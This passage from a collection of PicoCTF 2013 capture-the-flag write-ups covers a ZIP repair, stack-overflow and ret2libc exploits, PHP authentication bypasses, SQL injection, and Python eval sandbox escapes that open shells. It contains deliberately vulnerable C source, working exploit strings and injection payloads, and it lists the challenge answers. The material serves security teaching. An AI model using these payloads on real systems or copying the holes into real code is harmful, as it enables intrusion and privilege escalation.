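    print("extract after repair: ", extract_member(repair_zip(SAMPLE), "Mag7-BW/key.txt"))
```

The central directory is used on purpose: scanning for `?? 03 04` would also match inside member data, and a ZIP tool lists members from the central directory anyway, which is why the listing worked while extraction (which reads the local header) failed. Had key.txt been deflated, the key would not have been legible in the dump and the repair would have been the only route.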
35 | 36 | ``` 37 | 00000040 E8 03 00 00 04 E8 03 00 00 4B 65 79 3A 20 4E 65 è....è...Key: Ne 38 | 00000050 78 74 20 73 74 6F 70 20 54 61 75 20 45 72 69 64 xt stop Tau Erid 39 | 00000060 61 6E 69 0A 50 4B 03 04 14 00 00 00 08 00 27 B6 ani.PK........'¶ 40 | ``` 41 | 42 | Alternatively, repair the archive. A ZIP local file header begins with the signature `50 4B 03 04` (`PK..`); compare the intact header of the next member at offset 0x64. Here the first two bytes have been overwritten with `3F 3F` (`??`). 43 | 44 | Patch those two bytes back to `50 4B`, and WinRAR extracts key.txt without complaint. 45 | 46 | **Answer:** Next stop Tau Eridani 47 | 48 | ## Other write-ups and resources 49 | 50 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/navsat/recovery.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/navsat/recovery.zip -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-1/overflow1-3948d17028101c40: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-1/overflow1-3948d17028101c40 -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-1/overflow1-3948d17028101c40.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "dump_stack.h" 7 | 8 | void vuln(int tmp, char *str) { 9 | int win = tmp; 10 | char buf[64]; 11 | strcpy(buf, str); 12 | dump_stack((void **) buf, 23, (void **) &tmp); 13 | printf("win = %d\n", win); 14 | if (win == 1) { 15 | execl("/bin/sh", "sh", NULL); 16 | } else { 17 | printf("Sorry, you lose.\n"); 18 | } 19 | exit(0); 20 | } 21 | 22 | int main(int argc, char **argv) { 23 | if (argc != 2) { 24 | printf("Usage: stack_overwrite [str]\n"); 25 | 
return 1; 26 | } 27 | 28 | uid_t euid = geteuid(); 29 | setresuid(euid, euid, euid); 30 | vuln(0, argv[1]); 31 | return 0; 32 | } 33 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-2/overflow2-44e63640e033ff2b: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-2/overflow2-44e63640e033ff2b -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-2/overflow2-44e63640e033ff2b.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "dump_stack.h" 7 | 8 | void vuln(int win, char *str) { 9 | char buf[64]; 10 | strcpy(buf, str); 11 | dump_stack((void **) buf, 23, (void **) &win); 12 | printf("win = %d\n", win); 13 | if (win == 1) { 14 | execl("/bin/sh", "sh", NULL); 15 | } else { 16 | printf("Sorry, you lose.\n"); 17 | } 18 | exit(0); 19 | } 20 | 21 | int main(int argc, char **argv) { 22 | if (argc != 2) { 23 | printf("Usage: stack_overwrite [str]\n"); 24 | return 1; 25 | } 26 | 27 | uid_t euid = geteuid(); 28 | setresuid(euid, euid, euid); 29 | vuln(0, argv[1]); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-3/overflow3-28d8a442fb232c0c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-3/overflow3-28d8a442fb232c0c -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-3/overflow3-28d8a442fb232c0c.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 
#include "dump_stack.h" 6 | 7 | /* 8 | * Goal: Get the program to run this function. 9 | */ 10 | void shell(void) { 11 | execl("/bin/sh", "sh", NULL); 12 | } 13 | 14 | void vuln(char *str) { 15 | char buf[64]; 16 | strcpy(buf, str); 17 | dump_stack((void **) buf, 21, (void **) &str); 18 | } 19 | 20 | int main(int argc, char **argv) { 21 | if (argc != 2) { 22 | printf("Usage: buffer_overflow [str]\n"); 23 | return 1; 24 | } 25 | 26 | uid_t euid = geteuid(); 27 | setresuid(euid, euid, euid); 28 | printf("shell function = %p\n", shell); 29 | vuln(argv[1]); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-4/overflow4-4834efeff17abdfb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-4/overflow4-4834efeff17abdfb -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-4/overflow4-4834efeff17abdfb.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "dump_stack.h" 6 | 7 | /* 8 | * Goal: Get the program to run a shell. 
9 | */ 10 | 11 | void vuln(char *str) { 12 | char buf[64]; 13 | strcpy(buf, str); 14 | dump_stack((void **) buf, 21, (void **) &str); 15 | } 16 | 17 | int main(int argc, char **argv) { 18 | if (argc != 2) { 19 | printf("Usage: buffer_overflow_shellcode [str]\n"); 20 | return 1; 21 | } 22 | 23 | uid_t euid = geteuid(); 24 | setresuid(euid, euid, euid); 25 | vuln(argv[1]); 26 | return 0; 27 | } 28 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-5/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Overflow 5 2 | 3 | **Category:** Binary Exploitation 4 | **Points:** 190 5 | **Description:** 6 | 7 | >Stack overflows are the most basic binary exploitation technique, but they 8 | >take a lot of skill to master. If you already know some C, these problems can 9 | >help acquaint you with stacks and binary exploitation in general. 10 | 11 | >Problem available on the shell machine in 12 | >/problems/stack_overflow_5_0353c1a83cb2fa0d , downloadable [here](https://2013.picoctf.com/problems/overflow5-0353c1a83cb2fa0d). Source is not 13 | >available for this problem. 14 | 15 | >If you solve the problem you will be able to read the key file by running 16 | 17 | >cat /problems/stack_overflow_5_0353c1a83cb2fa0d/key 18 | >on the PicoCTF shell machine. 19 | 20 | >**Hint:** Now you don't have source, and you aren't allowed to execute code 21 | >on the stack. Keep calm and objdump -d 22 | 23 | 24 | ## Write-up 25 | **Disclaimer: I've spoken to people who solved this during the actual contest. They 26 | said that using ulimit to solve this problem was encouraged and/or hinted at by 27 | the creators. In addition, I haven't been able to exploit it with ASLR 28 | enabled.** 29 | 30 | **Disclaimer 2: While the technique will remain the same, solving this on the 31 | server will yield very different results.** 32 | 33 | No source. 
The first thing we should do is just find the offset to hijack `%eip` 34 | ``` 35 | $ strace ./overflow5-0353c1a83cb2fa0d $(python -c 'print "A"*1036 + "BBBB"') 36 | ... 37 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- 38 | ``` 39 | 1036 bytes and then we have control over eip. Now what we do is use gdb with 40 | the ASLR disabled to find the address of some important items, namely 41 | `system()` and the address of "/bin/sh" in libc. 42 | ``` 43 | $ setarch `uname -m` -R gdb -q ./overflow5-0353c1a83cb2fa0d 44 | Reading symbols from ./overflow5-0353c1a83cb2fa0d...(no debugging symbols 45 | found)...done. 46 | (gdb) b*main 47 | Breakpoint 1 at 0x80483c0 48 | (gdb) r 49 | Starting program: 50 | /vagrant/write-ups-2013/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d 51 | 52 | Breakpoint 1, 0x080483c0 in main () 53 | (gdb) p system 54 | $1 = {} 0xf7e62190 55 | (gdb) info proc map 56 | process 6912 57 | Mapped address spaces: 58 | 59 | Start Addr End Addr Size Offset objfile 60 | 0x8048000 0x8049000 0x1000 0x0 /vagrant/write-ups-2013/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d 61 | 0x8049000 0x804a000 0x1000 0x0 /vagrant/write-ups-2013/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d 62 | 0x804a000 0x804b000 0x1000 0x1000 /vagrant/write-ups-2013/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d 63 | 0xf7e21000 0xf7e22000 0x1000 0x0 64 | 0xf7e22000 0xf7fca000 0x1a8000 0x0 /lib/i386-linux-gnu/libc-2.19.so 65 | 0xf7fca000 0xf7fcc000 0x2000 0x1a8000 /lib/i386-linux-gnu/libc-2.19.so 66 | 0xf7fcc000 0xf7fcd000 0x1000 0x1aa000 /lib/i386-linux-gnu/libc-2.19.so 67 | 0xf7fcd000 0xf7fd0000 0x3000 0x0 68 | 0xf7fd9000 0xf7fdb000 0x2000 0x0 69 | 0xf7fdb000 0xf7fdc000 0x1000 0x0 [vdso] 70 | 0xf7fdc000 0xf7ffc000 0x20000 0x0 /lib/i386-linux-gnu/ld-2.19.so 71 | 0xf7ffc000 0xf7ffd000 0x1000 0x1f000 /lib/i386-linux-gnu/ld-2.19.so 72 | 0xf7ffd000 0xf7ffe000 0x1000 0x20000 /lib/i386-linux-gnu/ld-2.19.so 73 | 0xfffdd000 0xffffe000 0x21000 0x0 
[stack] 74 | (gdb) find 0xf7e22000, +9999999,"/bin/sh" 75 | 0xf7f82a24 76 | ``` 77 | Now that we have the addresses of system() and "/bin/sh" we can overwrite the saved return address with system() and lay out the frame it expects after it: four bytes of junk where system() will look for its own return address, then the pointer to "/bin/sh" as its single argument 78 | 79 | 80 | ``` 81 | setarch `uname -m` -R ./overflow5-0353c1a83cb2fa0d $(python -c 'print "A"*1036 82 | + "\x90\x21\xe6\xf7" + "JUNK" + "\x24\x2a\xf8\xf7"') 83 | ``` 84 | pwn. 85 | 86 | ## Other write-ups and resources 87 | 88 | * none yet 89 | -------------------------------------------------------------------------------- /pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/overflow-5/overflow5-0353c1a83cb2fa0d -------------------------------------------------------------------------------- /pico-ctf-2013/php2/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: PHP2 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 90 5 | **Description:** 6 | 7 | > We found a [simple web page](https://2013.picoctf.com/problems/php2/) that seems to want us to authenticate, but we can't figure out how... can you? 8 | 9 | ## Write-up 10 | > In this challenge we're exploiting a simple PHP script. Our goal is to get the flag to print. 11 | > We can find the script's source at [https://2013.picoctf.com/problems/php2/index.phps](https://2013.picoctf.com/problems/php2/index.phps) 12 | > Our script: 13 | 14 | ``` 15 | not allowed!

"); 18 | exit(); 19 | } 20 | 21 | $_GET[id] = urldecode($_GET[id]); 22 | if($_GET[id] == "admin") 23 | { 24 | echo "

Access granted!

"; 25 | echo "

Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

"; 26 | } 27 | ?> 28 | 29 | 30 |

31 | Can you authenticate to this website? 32 | 33 | ``` 34 | > The script first calls eregi() to check whether the GET variable 'id' matches 'admin', and exits if it does. 35 | > It then calls urldecode() on 'id' and checks whether the result equals 'admin'. 36 | > We exploit this by URL-encoding the word 'admin' (using the chart [here](http://www.w3schools.com/tags/ref_urlencode.asp)) and passing the encoded word as the id variable. 37 | > Note that the % signs must be encoded as well (as %25): PHP already URL-decodes the query string once when it builds $_GET, so a single encoding would arrive as 'admin' and be caught by eregi(); double encoding survives that first decode and only becomes 'admin' inside the script's own urldecode(). 38 | > Solution: 39 | > https://2013.picoctf.com/problems/php2/index.php?id=%2561%2564%256d%2569%256e 40 | 41 | **Answer: b4cc845aa05ed9b0ce823cb04f253e27** 42 | 43 | ## Other write-ups and resources 44 | 45 | * [https://github.com/BatmansKitchen/ctf-writeups/tree/master/2013-picoctf/PHP2](https://github.com/BatmansKitchen/ctf-writeups/tree/master/2013-picoctf/PHP2) 46 | * [https://github.com/innoying/hydrantlabs.org-old/blob/master/content/Security/picoCTF/2013/PHP2/index.jade](https://github.com/innoying/hydrantlabs.org-old/blob/master/content/Security/picoCTF/2013/PHP2/index.jade) 47 | -------------------------------------------------------------------------------- /pico-ctf-2013/php3/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: PHP 3 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 120 5 | **Description:** 6 | 7 | > It looks like [this site](http://2013.picoctf.com/problems/php3/) uses MD5 to hash passwords, but I don't think they're doing it quite right... 8 | 9 | ## Write-up 10 | We're given the following script and the task of exploiting it to get the flag. 11 | ``` 12 | 13 | 14 | Secure Web Login 15 | 16 | 17 | Logged in! Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

"; 28 | } 29 | 30 | if($query[user] != "admin") { 31 | echo("

You are not admin!

"); 32 | } 33 | } 34 | 35 | ?> 36 | 37 | 38 | 39 | 40 | 41 | 42 | Source 43 | 44 | ``` 45 | > We can solve the challenge simply by putting in **admin') --** as the username and **pass** as the password. 46 | > This converts the mySQL query in the script to treat everything after the username as a comment. Thus giving us the answer. 47 | 48 | ***Note as of 12 March 2016 , this challenge is offline. This writeup is included for learning purposes.*** 49 | 50 | **Answer: 8ab9b92c174dd483ad17cee1bb0c5bdb** 51 | 52 | ## Other write-ups and resources 53 | 54 | * [http://blog.phuongnam.org/2013/07/picoctf.html](http://blog.phuongnam.org/2013/07/picoctf.html) 55 | * [https://github.com/elc1798/stuyfyre-picoctf-2013/blob/master/PHP3-120/Solution.txt](https://github.com/elc1798/stuyfyre-picoctf-2013/blob/master/PHP3-120/Solution.txt) 56 | -------------------------------------------------------------------------------- /pico-ctf-2013/php4/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: PHP 4 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 110 5 | **Description:** 6 | 7 | > It looks like our web administrators updated their MD5 code after the PHP3 fiasco. However, I still don't think they fixed all the bugs on [this site](http://2013.picoctf.com/problems/php4/). 8 | > Can you show them what they did wrong by logging in again? 
9 | 10 | ## Write-up 11 | *None Yet* 12 | 13 | **Answer: 50c90a07790d4d0ab7fc7f695cb61d0e** 14 | 15 | ## Other write-ups and resources 16 | 17 | * [http://sturzu.org/2013/05/07/picoctf-writeup-php4-110](http://sturzu.org/2013/05/07/picoctf-writeup-php4-110) 18 | * [https://dook.biz/2015/02/picoctf-2013-php4-writeup/](https://dook.biz/2015/02/picoctf-2013-php4-writeup/) 19 | -------------------------------------------------------------------------------- /pico-ctf-2013/pilot-logic/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Pilot Logic 2 | 3 | **Category:** Forensic 4 | **Points:** 75 5 | **Description:** 6 | 7 | > You've gotten a [partial dump of the disk](https://2013.picoctf.com/problems/pilot_image) from the hangar's machine, and you're pretty sure the pilot's password is *cleverly hidden* somewhere within it... 8 | > 9 | > The disk image can be found on the shell machines at `/problems/pilot_logic.img` and the contents of the image are available in `/problems/pilot_logic/` 10 | > 11 | > [offline file](pilot_image) 12 | 13 | ## Write-up 14 | 15 | Open the image in [Autopsy](http://www.sleuthkit.org/autopsy/): create a new case and import the image file into it. 
16 | 17 | ![](solve.png) 18 | 19 | ``` 20 | The pilot's passphase is "You can't take the sky from me" 21 | ``` 22 | 23 | **Answer:** You can't take the sky from me 24 | 25 | ## Other write-ups and resources 26 | 27 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/pilot-logic/pilot_image: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/pilot-logic/pilot_image -------------------------------------------------------------------------------- /pico-ctf-2013/pilot-logic/solve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/pilot-logic/solve.png -------------------------------------------------------------------------------- /pico-ctf-2013/pretty-hard-programming/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Pretty Hard Programming 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 95 5 | **Description:** 6 | 7 | > If you can guess the admin's password you can get a key 8 | > [Problem](https://2013.picoctf.com/problems/php1/)[Source](https://2013.picoctf.com/problems/php1/index.phps) 9 | 10 | ## Write-up 11 | Looking at the source code we see that we must get the password variable to match the secret_key variable. 12 | We also notice that the script extracts every GET parameter into a PHP variable of the same name, so a request can overwrite secret_key itself and we never need to know its real value. Changing the URL to: 13 | https://2013.picoctf.com/problems/php1/index.php?password=fakepassword&secret_key=fakepassword gives us the flag. 
14 | 15 | **Answer:** php_means_youre_going_to_have_a_bad_time 16 | 17 | ## Other write-ups and resources 18 | 19 | * none yet 20 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-1/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 1 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 85 5 | **Description:** 6 | 7 | > A wise master wishes to teach you an ancient art: [Python Eval 1](https://2013.picoctf.com/problems/pyeval/stage1.html). 8 | 9 | ## Write-up 10 | 11 | > This challenge involves exploiting a Python input 'eval' function. 12 | 13 | > Our objective for this challenge is to get the following script (running at python.picoctf.com 6361) to print out the 'flag' variable. 14 | 15 | ``` 16 | # task1.py 17 | print "Welcome to mystery math!" 18 | 19 | flag = "xxxxxxxxxx" 20 | 21 | while True: 22 | x = input("Enter number 1> ") 23 | x = x*x + ord(flag[0]) * ord(flag[1]) + ord(flag[2]) * x 24 | y = input("Enter number 2> ") 25 | if y / 6 + 7 - y == x: 26 | print "Here ya go! ", flag 27 | exit(0) 28 | else: 29 | print "Your lucky number is ", x - y 30 | ``` 31 | 32 | > We can see that the script uses the x and y variables as 'keys' to print out the flag and that it defines those variables with the vulnerable input function. 33 | > After the variables have been defined, the script calculates whether they are correct using the integer representation of the flag's first three letters as an additional secret. 34 | 35 | > Since Python 2's input function evaluates whatever we pass it as an expression, with the script's globals in scope, we can make the Python interpreter give us the flag by making it throw an exception that mentions the flag. 36 | > Entering *int(flag)* will make the program crash with the answer. 
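The mechanism behind this and Python Eval 2, as an added example (not the challenge's own task1.py), written for Python 3 so it can be run today: Python 2's `input()` evaluated the typed text, Python 3's does not, so the vulnerable reader here calls `eval()` explicitly to keep the old behaviour, next to a reader built on `ast.literal_eval()` that accepts only a literal. The flag is the placeholder from the published source. It also goes one step past the write-up: with an evaluating reader the exception trick is not even needed, because typing `flag` simply returns the secret as the "number".

```python
"""Added example, not the challenge's own task1.py: the Python 2 input()
weakness behind Python Eval 1 and 2, reproduced in Python 3 beside the fix.
The flag value is the placeholder from the published source."""
import ast

flag = "xxxxxxxxxx"   # the secret the script keeps in a global, as task1.py does


def read_number_py2_style(text: str):
    """Equivalent of Python 2's input(): evaluate the text as an expression
    with the script's own globals in scope, so 'flag' is reachable."""
    return eval(text, globals())        # deliberately unsafe


def read_number_safe(text: str) -> int:
    """Accept an integer literal and nothing else: calls, names and
    attribute access are rejected before anything is evaluated."""
    value = ast.literal_eval(text)
    if not isinstance(value, int) or isinstance(value, bool):
        raise ValueError("a plain integer is required")
    return value


def error_text(reader, payload: str = "int(flag)"):
    """Feed one reader the write-up's payload and return the error message
    it produces (which carries the flag for the eval-based reader), or
    None when the payload is accepted."""
    try:
        reader(payload)
    except Exception as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    print("py2-style, payload 'flag'     :", read_number_py2_style("flag"))
    print("py2-style, payload 'int(flag)':", error_text(read_number_py2_style))
    print("safe,      payload 'int(flag)':", error_text(read_number_safe))
```

`ast.literal_eval()` still raises on bad input, but its message describes the rejected syntax node, not any value from the script's globals, so there is nothing to leak.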
37 | ``` 38 | Enter number 1> int(flag) 39 | Traceback (most recent call last): 40 | File "/home/py1/task1.py", line 8, in 41 | x = input("Enter number 1> ") 42 | File "", line 1, in 43 | ValueError: invalid literal for int() with base 10: 'eval_is_best_thing_evar' 44 | ``` 45 | 46 | **Answer: eval_is_best_thing_evar** 47 | 48 | ## Other write-ups and resources 49 | 50 | * none yet 51 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-2/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 2 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 90 5 | **Description:** 6 | 7 | > It is recommended that you complete Python Eval 1 before trying [Python Eval 2](https://2013.picoctf.com/problems/pyeval/stage2.html). 8 | 9 | ## Write-up 10 | >This challenge is very similiar to Python Eval 1 and also involves exploiting a Python script's input function. 11 | > We're given the following script (running at python.picoctf.com 6362) and are expected to get the program to print out the flag variable. 12 | 13 | ``` 14 | # task2.py 15 | from random import randint 16 | 17 | def printpegs(code): 18 | print " --------------------- " 19 | print " |", 20 | for c in code: 21 | print c, "|", 22 | print "" 23 | print " --------------------- " 24 | 25 | print "Master Mind Game" 26 | 27 | flag = "xxxxxxxxxx" 28 | 29 | mm_code = (randint(0,9), randint(0,9), randint(0,9), randint(0,9), randint(0,9)) 30 | print "I've set my code. Guess it!" 31 | 32 | print "Rules: You should input your guesses as 5 digits separated by commas." 33 | print " I will respond by marking the correct digits with a 2, marking" 34 | print " digits in the wrong place with a 1, and marking wrong digits 0." 35 | 36 | while True: 37 | guess = input('guess> ') 38 | if len(guess) != 5: 39 | print "You must guess a 5-digit code!" 
40 | continue 41 | 42 | printpegs(guess) 43 | 44 | right = map(lambda x,y: (x == y) + (x in mm_code), guess, mm_code) 45 | printpegs(right) 46 | 47 | if guess == mm_code: 48 | print "You got it right!" 49 | exit(0) 50 | ``` 51 | > This script defines a 'guess' variable with the vulnerable input function. It then calculates wheter the guess is correct. 52 | 53 | > We can solve this challenge by causing the program to throw an exception. 54 | 55 | >Inputting *int(flag)* gives us the answer. 56 | ``` 57 | guess> int(flag) 58 | Traceback (most recent call last): 59 | File "/home/py2/task2.py", line 25, in 60 | guess = input('guess> ') 61 | File "", line 1, in 62 | ValueError: invalid literal for int() with base 10: 'i_are_a_pyeval_mastermind' 63 | ``` 64 | 65 | 66 | 67 | **Answer: i_are_a_pyeval_mastermind** 68 | 69 | ## Other write-ups and resources 70 | 71 | * none yet 72 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-3/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 3 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 110 5 | **Description:** 6 | 7 | > Give Python Eval 1 and 2 a shot before moving on to [Python Eval 3](https://2013.picoctf.com/problems/pyeval/stage3.html). 8 | 9 | ## Write-up 10 | >This challenge involves exploiting a Python script's input 'eval' function using the script's imports. 11 | 12 | > We're given the follwing script and the task of getting a shell to read the flag. 13 | 14 | ``` 15 | # task3.py 16 | # Remember kids: this is bad code. Try not code like this :P 17 | from os import path 18 | del __builtins__.__dict__['__import__'] 19 | del __builtins__.__dict__['reload'] 20 | 21 | print "Welcome to the food menu!" 22 | choices = ( 23 | ("Chicken Asada Burrito", 7.69, "caburrito.txt"), 24 | ("Beef Chow Mein", 6.69, "beefchow.txt"), 25 | ("MeatBurger Deluxe", 10.49, "no description"), 26 | # ... 
27 | ) 28 | 29 | def print_description(n): 30 | print "" 31 | if n >= len(choices): 32 | print "No such item!" 33 | elif not path.exists(choices[n][2]): 34 | print "No description yet, but we promise it's tasty!" 35 | else: 36 | print open(choices[n][2]).read() 37 | 38 | def show_menu(): 39 | for i in xrange(len(choices)): 40 | print "[% 2d] $% 3.2f %s" % (i, choices[i][1], choices[i][0]) 41 | 42 | while True: 43 | print "Which description do you want to read?" 44 | show_menu() 45 | print_description(input('> ')) 46 | ``` 47 | 48 | > We can see that the ability to import and call a shell has been blocked so we need to look for another way. Opening up a Python interperter from our 49 | > local machine and checking what the import path gives us reveals an answer. 50 | 51 | ``` 52 | >>> from os import path 53 | >>> dir(path) 54 | ['__all__', '__builtins__', '__doc__', '__file__', '__name__', '__package__', '_joinrealpath', '_unicode', '_uvarprog', '_varprog', 'abspath', 'altsep', 'basename', 'commonprefix', 'curdir', 'defpath', 'devnull', 'dirname', 'exists', 'expanduser', 'expandvars', 'extsep', 'genericpath', 'getatime', 'getctime', 'getmtime', 'getsize', 'isabs', 'isdir', 'isfile', 'islink', 'ismount', 'join', 'lexists', 'normcase', 'normpath', 'os', 'pardir', 'pathsep', 'realpath', 'relpath', 'samefile', 'sameopenfile', 'samestat', 'sep', 'split', 'splitdrive', 'splitext', 'stat', 'supports_unicode_filenames', 'sys', 'walk', 'warnings'] 55 | ``` 56 | 57 | > The import path contains a reference to the module os so we can simply call a shell using path. 
Inputting the following commands gives us our answer 58 | ``` 59 | > path.os.execlp('sh','sh') 60 | > ls 61 | run.sh 62 | task3.py 63 | your_flag_here 64 | > cat your_flag_here 65 | eval_is_super_OSsome 66 | ``` 67 | 68 | 69 | 70 | 71 | **Answer: eval_is_super_OSsome** 72 | 73 | ## Other write-ups and resources 74 | * [https://www.uns.vn/picoctf-2013-write-up-python-eval-3/](https://www.uns.vn/picoctf-2013-write-up-python-eval-3/) 75 | * [http://hacktracking.blogspot.com/2014/01/picoctf-2k13-python-eval-3.html](http://hacktracking.blogspot.com/2014/01/picoctf-2k13-python-eval-3.html) 76 | * [https://github.com/james9909/PracticeCTF/tree/master/picoCTF-2013/Python%20Eval%203](https://github.com/james9909/PracticeCTF/tree/master/picoCTF-2013/Python%20Eval%203) 77 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-4/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 4 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 130 5 | **Description:** 6 | 7 | > Solving the previous Python Eval probelms will help you prepare for [Python Eval 4](https://2013.picoctf.com/problems/pyeval/stage4.html) 8 | 9 | ## Write-up 10 | *None Yet* 11 | 12 | **Answer: kids_dont_code_like_this_at_home ** 13 | 14 | ## Other write-ups and resources 15 | 16 | * [http://hacktracking.blogspot.com/2014/02/picoctf-2k13-python-eval-4.html](http://hacktracking.blogspot.com/2014/02/picoctf-2k13-python-eval-4.html) 17 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-5/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 5 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 140 5 | **Description:** 6 | 7 | > A true challenge awaits you at python.picoctf.com:6365. [Source](https://2013.picoctf.com/problems/pyeval/task5.py). 
8 | 9 | ## Write-up 10 | 11 | > This challenge is very simliar to Python Eval 3. We're given a Python script to exploit and the task of getting a shell on the server running it ; in order to read the flag. 12 | > The script's author has removed the ability to call __builtins__ and have given us a dictionary with an empty variable 'x'. 13 | > They also have limited us to 50 chars of eval at a time. 14 | > Our approache to solving this will be to use the empty variable 'x''s builtins to exploit this script. 15 | > The follwing commands give us our shell. 16 | 17 | ``` 18 | __builtins__[0]=x.__class__.__base__ 19 | __builtins__[1]=__builtins__[0].__subclasses__ 20 | __builtins__[2]=__builtins__[1]() 21 | __builtins__[3]=__builtins__[2][53] 22 | __builtins__[4]=__builtins__[3].__repr__ 23 | __builtins__[5]=__builtins__[4].im_func 24 | __builtins__[6]=__builtins__[5].func_globals 25 | __builtins__[7]=__builtins__[6]['linecache'] 26 | __builtins__[8]=__builtins__[7].os 27 | __builtins__[8].execl('/bin/sh','sh') 28 | ``` 29 | 30 | > The first six lines of input give us access to *im_func* 's functions. One of those functions is the func_globals function. The func_globals function returns a dictionary of a modules global scope. 31 | > The next two lines calls func_globals with the argument of the module linecache. The linecache module has the module os module in scope. 32 | > We use the last two lines to use the module os to call a shell. 
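The defensive counterpart to the Eval 1, 2, 3 and 5 write-ups above, as an added example that is not part of this write-up or of the PicoCTF code: Python 2's `input()` is `eval(raw_input())`, and deleting `__import__` or swapping out `__builtins__` does not contain it, as the attribute walks above show; the fix is to never evaluate the input and to accept only the literal shape the game expects. Written for Python 3, where the same bug is spelled `eval(input())`; the function names are assumed, and the 50-character cap is modelled on the Eval 5 limit.

```python
import ast

MAX_INPUT_LEN = 50  # assumed cap, modelled on the Eval 5 limit on input length


def unsafe_parse(text):
    """The bug in task1.py/task2.py, in Python 3 spelling.

    Python 2's input() is eval(raw_input()): the string is run as an
    expression, so "int(flag)" or an attribute walk starting from any object
    executes with the script's privileges. Shown only for contrast.
    """
    return eval(text)  # intentionally vulnerable


def _literal(text):
    """Parse text as a Python literal and nothing else.

    ast.literal_eval builds no calls, attribute lookups or names, so
    "int(flag)", "__import__('os')" and "x.__class__" all fail here. Every
    failure is normalised to ValueError so callers need one except clause.
    """
    if len(text) > MAX_INPUT_LEN:
        raise ValueError("input too long")
    try:
        return ast.literal_eval(text.strip())
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        raise ValueError("not a plain literal: %r" % text) from exc


def parse_number(text):
    """task1.py wanted a number: accept exactly one int literal."""
    value = _literal(text)
    if type(value) is not int:  # bool is a subclass of int; reject it too
        raise ValueError("expected an integer literal")
    return value


def parse_guess(text):
    """task2.py wanted 5 digits separated by commas: accept exactly that."""
    value = _literal(text)
    if not isinstance(value, tuple) or len(value) != 5:
        raise ValueError("guess must be 5 digits separated by commas")
    if not all(type(d) is int and 0 <= d <= 9 for d in value):
        raise ValueError("each guess element must be a digit 0-9")
    return value


def score_guess(guess, code):
    """The Mastermind marking rule from task2.py, applied to validated input:
    2 for a correct digit, 1 for a digit present elsewhere, 0 otherwise."""
    return tuple((g == c) + (g in code) for g, c in zip(guess, code))


if __name__ == "__main__":
    # Constructed inputs: a legitimate guess and the payloads from the write-ups.
    code = (3, 1, 4, 1, 5)
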